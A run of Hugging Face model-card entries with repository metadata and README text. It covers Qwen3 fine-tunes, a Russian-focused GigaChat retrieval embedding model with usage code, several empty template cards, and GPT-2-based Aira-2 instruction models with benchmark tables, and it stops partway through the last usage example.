aferrante/MNLP_M3_mcqa_modelNew | aferrante | 2025-06-09T12:51:20Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatibl... | text-generation | 2025-06-09T12:25:19Z | ---
base_model: unsloth/Qwen3-0.6B-Base
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
- sft
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** aferrante
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-0.6B-Base
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
ai-sage/Giga-Retrieval-instruct | ai-sage | 2025-06-09T12:50:42Z | 153 | 4 | null | [
"safetensors",
"gigarembed",
"feature-extraction",
"custom_code",
"ru",
"en",
"license:mit",
"region:us"
] | feature-extraction | 2025-05-29T12:38:46Z | ---
license: mit
language:
- ru
- en
pipeline_tag: feature-extraction
---
## Giga-Retrieval-instruct
- Base Decoder-only LLM: Pruned GigaChat-3b
- Pooling Type: Latent-Attention
- Embedding Dimension: 2048
## Usage
Below is an example of encoding queries and passages.
### Requirements
```bash
pip install -q transformers==4.46.3 sentence-transformers==3.3.1 datasets langchain_community langchain_huggingface langchain_gigachat
```
### Transformers
```python
import os
import torch
import torch.nn.functional as F
from transformers import AutoTokenizer, AutoModel
# Each query needs to be accompanied by a corresponding instruction describing the task.
task_name_to_instruct = {"example": "Given a question, retrieve passages that answer the question",}
query_prefix = task_name_to_instruct["example"] + "\nquestion: "
queries = [
'are judo throws allowed in wrestling?',
'how to become a radiology technician in michigan?'
]
# No instruction needed for retrieval passages
passage_prefix = ""
passages = [
"Since you're reading this, you are probably someone from a judo background or someone who is just wondering how judo techniques can be applied under wrestling rules. So without further ado, let's get to the question. Are Judo throws allowed in wrestling? Yes, judo throws are allowed in freestyle and folkstyle wrestling. You only need to be careful to follow the slam rules when executing judo throws. In wrestling, a slam is lifting and returning an opponent to the mat with unnecessary force.",
"Below are the basic steps to becoming a radiologic technologist in Michigan:Earn a high school diploma. As with most careers in health care, a high school education is the first step to finding entry-level employment. Taking classes in math and science, such as anatomy, biology, chemistry, physiology, and physics, can help prepare students for their college studies and future careers.Earn an associate degree. Entry-level radiologic positions typically require at least an Associate of Applied Science. Before enrolling in one of these degree programs, students should make sure it has been properly accredited by the Joint Review Committee on Education in Radiologic Technology (JRCERT).Get licensed or certified in the state of Michigan."
]
# load the model (trust_remote_code pulls in the custom gigarembed code;
# tokenization is handled inside model.encode)
model = AutoModel.from_pretrained('ai-sage/Giga-Retrieval-instruct', trust_remote_code=True)
# get the embeddings
query_embeddings = model.encode(queries, instruction=query_prefix)
passage_embeddings = model.encode(passages, instruction=passage_prefix)
scores = (query_embeddings @ passage_embeddings.T) * 100
print(scores.tolist())
```
### LangChain
```python
import torch
from langchain_huggingface import HuggingFaceEmbeddings
# Load model
embeddings = HuggingFaceEmbeddings(
model_name='ai-sage/Giga-Retrieval-instruct',
encode_kwargs={},
model_kwargs={
'device': 'cuda', # or 'cpu'
'trust_remote_code': True,
'model_kwargs': {'torch_dtype': torch.bfloat16},
'prompts': {'query': 'Given a question, retrieve passages that answer the question\nquestion: '}
}
)
# Tokenizer
embeddings._client.tokenizer.tokenize("Hello world! I am GigaChat")
# Query embeddings
query_embeddings = embeddings.embed_query("Hello world!")
print(f"Your embeddings: {query_embeddings[0:20]}...")
print(f"Vector size: {len(query_embeddings)}")
# Document embeddings
documents = ["foo bar", "bar foo"]
documents_embeddings = embeddings.embed_documents(documents)
print(f"Vector size: {len(documents_embeddings)} x {len(documents_embeddings[0])}")
```
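Whichever API above produces the vectors, ranking passages against a query reduces to cosine similarity. A minimal sketch with dummy vectors (the helper below is illustrative and not part of the model's API):

```python
import numpy as np

def rank_passages(query_vec, passage_vecs):
    # Cosine similarity: L2-normalize both sides, then take dot products.
    q = np.asarray(query_vec, dtype=float)
    p = np.asarray(passage_vecs, dtype=float)
    q = q / np.linalg.norm(q)
    p = p / np.linalg.norm(p, axis=1, keepdims=True)
    scores = p @ q
    # Passage indices sorted from most to least similar.
    return np.argsort(-scores), scores

order, scores = rank_passages([1.0, 0.0], [[0.9, 0.1], [0.0, 1.0]])
print(order.tolist())  # → [0, 1]
```

In practice you would pass the outputs of `model.encode` (or `embeddings.embed_query` / `embeddings.embed_documents`) in place of the dummy vectors.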
## Instruction Prompting
**Using instructions to improve embedding quality**
To get more accurate results, especially for retrieval tasks, prepend a natural-language instruction to the text query. This helps the model understand the context and purpose of the query, which improves result quality. Note that the instruction is added only before the query, never before the document.
For **retrieval tasks** (e.g., finding the answer to a question in a text), you can use the instruction:
`'Дан вопрос, необходимо найти абзац текста с ответом \nвопрос: {query}'`.
This approach is especially effective for search and information-extraction tasks, such as finding relevant documents or extracting answers from text.
**Example instructions for retrieval tasks:**
- `'Дан вопрос, необходимо найти абзац текста с ответом \nвопрос: {query}'`
- `'Given the question, find a paragraph with the answer \nquestion: {query}'`
Using instructions noticeably improves search quality and result relevance, as confirmed on benchmarks such as RuBQ. For symmetric tasks, prepending the instruction to every query keeps inputs consistent and improves accuracy.
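The prefixing convention described here can be sketched as a small helper. A hedged example (the function name is illustrative; only the instruction string comes from this card):

```python
# Build an instructed query string for retrieval. Only the query side
# gets the prefix; passages are embedded as plain text.
RETRIEVAL_INSTRUCTION = "Дан вопрос, необходимо найти абзац текста с ответом"

def build_instructed_query(query: str) -> str:
    # Mirrors the '{instruction} \nвопрос: {query}' template above.
    return f"{RETRIEVAL_INSTRUCTION} \nвопрос: {query}"

print(build_instructed_query("Кто автор 'Войны и мира'?"))
```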
## Supported Languages
This model was initialized from a pretrained GigaChat checkpoint and further trained on a mix of English and Russian data. However, since GigaChat was pretrained mostly on Russian-language data, we recommend using this model for Russian only.
## FAQ
1. Do I need to add instructions to the query?
Yes, this is how the model was trained; otherwise you will see degraded quality. The task definition should be a one-sentence instruction that describes the task. This is how the text embeddings are tailored to different scenarios via natural-language instructions.
On the other hand, no instruction needs to be added on the document side.
2. Why do my reproduced results differ slightly from those reported in the model card?
Different versions of the transformers and pytorch libraries can cause small but nonzero differences in results.
## Limitations
This model cannot be used on inputs longer than 4096 tokens. |
mina5rovic/W4A16_margo | mina5rovic | 2025-06-09T12:42:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"compressed-tensors",
"region:us"
] | text-generation | 2025-06-09T12:42:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr2.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_baseline | ou474747 | 2025-06-09T12:36:57Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T12:36:46Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr1.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_low_lr | ou474747 | 2025-06-09T12:36:23Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T09:17:05Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
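As a hedged sketch of what the calculator above computes, emissions can be approximated from hardware power draw, runtime, datacenter overhead (PUE), and the grid's carbon intensity. All numeric values below are illustrative assumptions, not figures for this model:

```python
def estimate_emissions_kg(power_watts, hours, pue=1.5, carbon_intensity_kg_per_kwh=0.4):
    """Rough CO2eq estimate: energy in kWh, scaled by datacenter overhead (PUE)
    and the grid's carbon intensity. All default values are illustrative assumptions."""
    energy_kwh = power_watts / 1000 * hours * pue
    return energy_kwh * carbon_intensity_kg_per_kwh

# Example: a single 400 W accelerator running for 10 hours
print(round(estimate_emissions_kg(400, 10), 2))  # 6 kWh at 0.4 kg/kWh -> 2.4 kg CO2eq
```

For a real estimate, substitute the hardware type, hours used, and compute region from the fields above once they are filled in.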
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
slavamarcin/HG_Qwen3-8B-LORA-ATLAS_0.1 | slavamarcin | 2025-06-09T12:13:06Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen3-8B",
"base_model:finetune:Qwen/Qwen3-8B",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T12:12:40Z | ---
base_model: Qwen/Qwen3-8B
library_name: transformers
model_name: HG_Qwen3-8B-LORA-ATLAS
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for HG_Qwen3-8B-LORA-ATLAS
This model is a fine-tuned version of [Qwen/Qwen3-8B](https://huggingface.co/Qwen/Qwen3-8B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="slavamarcin/HG_Qwen3-8B-LORA-ATLAS", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/slavamarcin03-vol/huggingface/runs/v7ze5zy5)
This model was trained with supervised fine-tuning (SFT).
### Framework versions
- TRL: 0.17.0
- Transformers: 4.51.3
- Pytorch: 2.6.0
- Datasets: 3.5.1
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
nicholasKluge/Aira-2-124M | nicholasKluge | 2025-06-09T12:11:24Z | 190 | 1 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gpt2",
"text-generation",
"alignment",
"instruction tuned",
"text generation",
"conversation",
"assistant",
"en",
"dataset:nicholasKluge/instruct-aira-dataset",
"arxiv:1803.05457",
"arxiv:2109.07958",
"arxiv:2203.09509",
"base_model:openai-com... | text-generation | 2023-06-07T21:16:23Z | ---
license: apache-2.0
datasets:
- nicholasKluge/instruct-aira-dataset
language:
- en
metrics:
- accuracy
library_name: transformers
tags:
- alignment
- instruction tuned
- text generation
- conversation
- assistant
pipeline_tag: text-generation
widget:
- text: "<|startofinstruction|>Can you explain what is Machine Learning?<|endofinstruction|>"
example_title: Machine Learning
- text: "<|startofinstruction|>Do you know anything about virtue ethics?<|endofinstruction|>"
example_title: Ethics
- text: "<|startofinstruction|>How can I make my girlfriend happy?<|endofinstruction|>"
  example_title: Advice
inference:
parameters:
repetition_penalty: 1.2
temperature: 0.1
top_k: 50
top_p: 1.0
max_new_tokens: 200
early_stopping: true
co2_eq_emissions:
emissions: 250
source: CodeCarbon
training_type: fine-tuning
geographical_location: United States of America
hardware_used: NVIDIA A100-SXM4-40GB
base_model:
- gpt2
---
# Aira-2-124M
Aira-2 is the second version of the Aira instruction-tuned series. Aira-2-124M is an instruction-tuned model based on [GPT-2](https://huggingface.co/gpt2). The model was trained on a dataset of prompts and completions generated synthetically by prompting already-tuned models (ChatGPT, Llama, Open-Assistant, etc.).
Check out our Gradio demo on [Spaces](https://huggingface.co/spaces/nicholasKluge/Aira-Demo).
## Details
- **Size:** 124,441,344 parameters
- **Dataset:** [Instruct-Aira Dataset](https://huggingface.co/datasets/nicholasKluge/instruct-aira-dataset)
- **Language:** English
- **Number of Epochs:** 5
- **Batch size:** 32
- **Optimizer:** `torch.optim.AdamW` (warmup_steps = 1e2, learning_rate = 5e-4, epsilon = 1e-8)
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.25 kg CO2 (Singapore)
- **Total Energy Consumption:** 0.52 kWh
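The warmup behavior implied by these optimizer settings can be sketched as follows. A linear ramp over the first 100 steps is an assumption for illustration; the card states `warmup_steps = 1e2` and `learning_rate = 5e-4` but not the exact scheduler shape:

```python
BASE_LR = 5e-4      # learning_rate from the details above
WARMUP_STEPS = 100  # warmup_steps = 1e2 from the details above

def lr_at_step(step, base_lr=BASE_LR, warmup_steps=WARMUP_STEPS):
    """Linear warmup: ramp from 0 to base_lr over warmup_steps, then hold.
    The linear ramp shape is an assumption, not stated in the card."""
    if step < warmup_steps:
        return base_lr * step / warmup_steps
    return base_lr

print(lr_at_step(50))   # halfway through warmup
print(lr_at_step(500))  # after warmup, the base learning rate
```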
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
Three special tokens are used to mark the user side of the interaction and the model's response:
`<|startofinstruction|>`What is a language model?`<|endofinstruction|>`A language model is a probability distribution over a vocabulary.`<|endofcompletion|>`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

tokenizer = AutoTokenizer.from_pretrained('nicholasKluge/Aira-2-124M')
aira = AutoModelForCausalLM.from_pretrained('nicholasKluge/Aira-2-124M')

aira.eval()
aira.to(device)

question = input("Enter your question: ")

inputs = tokenizer(tokenizer.bos_token + question + tokenizer.sep_token,
                   add_special_tokens=False,
                   return_tensors="pt").to(device)

responses = aira.generate(**inputs, num_return_sequences=2)

print(f"Question: 👤 {question}\n")

for i, response in enumerate(responses):
    print(f'Response {i+1}: 🤖 {tokenizer.decode(response, skip_special_tokens=True).replace(question, "")}')
```
The model will output something like:
```markdown
>>>Question: 👤 What is the capital of Brazil?
>>>Response 1: 🤖 The capital of Brazil is Brasília.
>>>Response 2: 🤖 The capital of Brazil is Brasília.
```
## Limitations
- **Hallucinations:** This model can produce content that can be mistaken for truth but is, in fact, misleading or entirely false, i.e., hallucination.
- **Biases and Toxicity:** This model inherits the social and historical stereotypes from the data used to train it. Given these biases, the model can produce toxic content, i.e., harmful, offensive, or detrimental to individuals, groups, or communities.
- **Repetition and Verbosity:** The model may get stuck on repetition loops (especially if the repetition penalty during generations is set to a meager value) or produce verbose responses unrelated to the prompt it was given.
## Evaluation
|Model |Average |[ARC](https://arxiv.org/abs/1803.05457) |[TruthfulQA](https://arxiv.org/abs/2109.07958) |[ToxiGen](https://arxiv.org/abs/2203.09509) |
| ---------------------------------------------------------------------- | -------- | -------------------------------------- | --------------------------------------------- | ------------------------------------------ |
|[Aira-2-124M-DPO](https://huggingface.co/nicholasKluge/Aira-2-124M-DPO) |**40.68** |**24.66** |**42.61** |**54.79** |
|[Aira-2-124M](https://huggingface.co/nicholasKluge/Aira-2-124M) |38.07 |24.57 |41.02 |48.62 |
|GPT-2 |35.37 |21.84 |40.67 |43.62 |
|[Aira-2-355M](https://huggingface.co/nicholasKluge/Aira-2-355M) |**39.68** |**27.56** |38.53 |**53.19** |
|GPT-2-medium |36.43 |27.05 |**40.76** |41.49 |
|[Aira-2-774M](https://huggingface.co/nicholasKluge/Aira-2-774M) |**42.26** |**28.75** |**41.33** |**56.70** |
|GPT-2-large |35.16 |25.94 |38.71 |40.85 |
|[Aira-2-1B5](https://huggingface.co/nicholasKluge/Aira-2-1B5) |**42.22** |28.92 |**41.16** |**56.60** |
|GPT-2-xl |36.84 |**30.29** |38.54 |41.70 |
* Evaluations were performed using the [Language Model Evaluation Harness](https://github.com/EleutherAI/lm-evaluation-harness) (by [EleutherAI](https://www.eleuther.ai/)).
## Cite as 🤗
```bibtex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
Aira-2-124M is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details.
|
nicholasKluge/Aira-2-355M | nicholasKluge | 2025-06-09T12:10:13Z | 187 | 2 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gpt2",
"text-generation",
"alignment",
"instruction tuned",
"text generation",
"conversation",
"assistant",
"en",
"dataset:nicholasKluge/instruct-aira-dataset",
"arxiv:1803.05457",
"arxiv:2109.07958",
"arxiv:2203.09509",
"base_model:openai-com... | text-generation | 2023-06-08T00:18:26Z | ---
datasets:
- nicholasKluge/instruct-aira-dataset
language:
- en
metrics:
- accuracy
library_name: transformers
tags:
- alignment
- instruction tuned
- text generation
- conversation
- assistant
pipeline_tag: text-generation
widget:
- text: "<|startofinstruction|>Can you explain what is Machine Learning?<|endofinstruction|>"
example_title: Machine Learning
- text: "<|startofinstruction|>Do you know anything about virtue ethics?<|endofinstruction|>"
example_title: Ethics
- text: "<|startofinstruction|>How can I make my girlfriend happy?<|endofinstruction|>"
  example_title: Advice
inference:
parameters:
repetition_penalty: 1.2
temperature: 0.1
top_k: 50
top_p: 1.0
max_new_tokens: 200
early_stopping: true
co2_eq_emissions:
emissions: 290
source: CodeCarbon
training_type: fine-tuning
geographical_location: United States of America
hardware_used: NVIDIA A100-SXM4-40GB
license: apache-2.0
base_model:
- gpt2-medium
---
# Aira-2-355M
Aira-2 is the second version of the Aira instruction-tuned series. Aira-2-355M is an instruction-tuned model based on [GPT-2-medium](https://huggingface.co/gpt2-medium). The model was trained on a dataset of prompts and completions generated synthetically by prompting already-tuned models (ChatGPT, Llama, Open-Assistant, etc.).
Check out our Gradio demo on [Spaces](https://huggingface.co/spaces/nicholasKluge/Aira-Demo).
## Details
- **Size:** 354,825,216 parameters
- **Dataset:** [Instruct-Aira Dataset](https://huggingface.co/datasets/nicholasKluge/instruct-aira-dataset)
- **Language:** English
- **Number of Epochs:** 3
- **Batch size:** 16
- **Optimizer:** `torch.optim.AdamW` (warmup_steps = 1e2, learning_rate = 5e-4, epsilon = 1e-8)
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.29 kg CO2 (United States of America)
- **Total Energy Consumption:** 0.83 kWh
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
Three special tokens are used to mark the user side of the interaction and the model's response:
`<|startofinstruction|>`What is a language model?`<|endofinstruction|>`A language model is a probability distribution over a vocabulary.`<|endofcompletion|>`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

tokenizer = AutoTokenizer.from_pretrained('nicholasKluge/Aira-2-355M')
aira = AutoModelForCausalLM.from_pretrained('nicholasKluge/Aira-2-355M')

aira.eval()
aira.to(device)

question = input("Enter your question: ")

